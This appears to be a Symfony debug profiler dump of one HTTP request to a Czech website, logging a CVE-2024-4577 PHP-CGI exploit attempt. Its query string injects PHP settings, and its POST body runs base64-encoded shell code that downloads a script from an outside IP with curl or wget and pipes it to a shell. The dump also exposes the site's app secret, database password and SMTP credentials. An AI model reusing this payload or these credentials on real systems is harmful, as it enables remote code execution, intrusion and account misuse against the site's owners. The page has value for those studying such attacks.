https://190.2.155.146/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

PageController :: getPage

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA
"")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Controller\Web\PageController::getPage"
_firewall_context
"security.firewall.map.context.main"
_links
Fig\Link\GenericLinkProvider {#1971
  -links: [
    "00000000000007b20000000000000000" => Fig\Link\Link {#1970
      -href: "https://190.2.155.146/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => true
      ]
      -attributes: []
    }
  ]
}
_remove_csp_headers
true
_route
"web_get_page"
_route_params
[
  "slug" => "hello.world"
]
_security_firewall_run
"_security_main"
_stopwatch_token
"11fd95"
slug
"hello.world"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"221"
content-type
"application/x-www-form-urlencoded"
host
"190.2.155.146:443"
upgrade-insecure-requests
"1"
user-agent
"Custom-AsyncHttpClient"
x-php-ob-level
"1"

Request Content

Raw

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Mon, 25 Nov 2024 19:52:27 GMT"
link
"<https://190.2.155.146/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation""
x-debug-exception
"Str%C3%A1nka%20nenalezena%21"
x-debug-exception-file
"%2Fvar%2Fprojects%2Fprozili%2Fvendor%2Fsymfony%2Fframework-bundle%2FController%2FAbstractController.php:340"
x-debug-token
"f140dc"
x-debug-token-link
"https://190.2.155.146/_profiler/939256"
x-previous-debug-token
"939256"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session 1

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

1 Usages
Stateless check enabled
Usage
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:44
[
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 44
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-http/Firewall/AccessListener.php"
    "line" => 87
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 49
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AccessListener"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 117
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 129
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/vendor/autoload_runtime.php"
    "line" => 35
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/var/projects/prozili/public/index.php"
    "line" => 5
    "args" => [
      "/var/projects/prozili/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"e2a7839a56fde13bb275757b3993fa4e"
CORS_ALLOW_ORIGIN
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL
"mysql://greendot:NecumV@localhost:3306/prozili?serverVersion=mariadb-10.5.15&charset=utf8"
MAILER_DSN
"smtp://info@tohlejsmeprozili.cz:gRLc8bZu2mag@smtp.tohlejsmeprozili.cz:587"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"221"
CONTENT_TYPE
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT
"/var/projects/prozili/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/projects/prozili/public"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"190.2.155.146:443"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"Custom-AsyncHttpClient"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_HTTPS
"on"
REDIRECT_QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/hello.world"
REMOTE_ADDR
"101.126.16.175"
REMOTE_PORT
"41666"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1732564347
REQUEST_TIME_FLOAT
1732564347.0708
REQUEST_URI
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/var/projects/prozili/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"190.2.155.146"
SERVER_ADMIN
"[no address given]"
SERVER_NAME
"190.2.155.146"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,MAILER_DSN,CORS_ALLOW_ORIGIN"
USER
"www-data"
proxy-nokeepalive
"1"

Sub Requests 1

ErrorController (token = 939256)

Key Value
_controller
"error_controller"
_links
Fig\Link\GenericLinkProvider {#1759
  -links: [
    "00000000000006d30000000000000000" => Fig\Link\Link {#1747
      -href: "https://190.2.155.146/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => true
      ]
      -attributes: []
    }
  ]
}
_stopwatch_token
"735cf0"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#1474
  #message: "Stránka nenalezena!"
  #code: 0
  #file: "/var/projects/prozili/vendor/symfony/framework-bundle/Controller/AbstractController.php"
  #line: 340
  -statusCode: 404
  -headers: []
  trace: {
    /var/projects/prozili/vendor/symfony/framework-bundle/Controller/AbstractController.php:340 {
      Symfony\Bundle\FrameworkBundle\Controller\AbstractController->createNotFoundException(string $message = 'Not Found', Throwable $previous = null): NotFoundHttpException …
      › {    return new NotFoundHttpException($message, $previous);}
    }
    /var/projects/prozili/src/Controller/Web/PageController.php:32 {
      App\Controller\Web\PageController->getPage(string $slug, CategoryRepository $categoryRepository, UrlGeneratorInterface $urlGenerator, Request $request, EntityManagerInterface $entityManager, dynamicReplacement $dynamicReplacement): Response …
      › if ($category == null and $slug != "api") {    throw $this->createNotFoundException('Stránka nenalezena!');}
    }
    /var/projects/prozili/vendor/symfony/http-kernel/HttpKernel.php:153 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › // call controller$response = $controller(...$arguments);}
    /var/projects/prozili/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/projects/prozili/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/projects/prozili/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
    }
    /var/projects/prozili/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /var/projects/prozili/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/var/projects/prozili/vendor/autoload_runtime.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#162 …8}